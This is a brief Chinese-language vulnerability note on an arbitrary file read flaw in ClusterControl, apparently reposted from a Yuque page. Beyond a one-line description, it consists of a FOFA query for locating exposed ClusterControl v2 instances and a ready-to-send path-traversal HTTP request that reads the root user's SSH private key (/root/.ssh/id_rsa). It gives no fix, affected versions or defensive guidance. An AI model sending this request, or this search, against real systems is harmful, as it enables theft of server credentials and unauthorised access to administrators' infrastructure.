登录 白背景

ClusterControl存在任意文件读取漏洞

一、漏洞简介

ClusterControl存在任意文件读取漏洞

二、影响版本

  • ClusterControl

三、资产测绘

  • fofatitle="ClusterControl v2"
  • 特征

1722451502061-4beeb55a-1bcf-4a7c-b01a-42a98912c76e.png

四、漏洞复现

GET /../../../../../../../../..//root/.ssh/id_rsa HTTP/1.1
Host: 
Accept-Encoding: identity
User-Agent: python-urllib3/1.26.4

1722451547700-43f9ca58-1cbd-45df-9f16-4bfd9a1829ba.png

原文: https://www.yuque.com/xiaokp7/ocvun2/sggos9gxdie0exto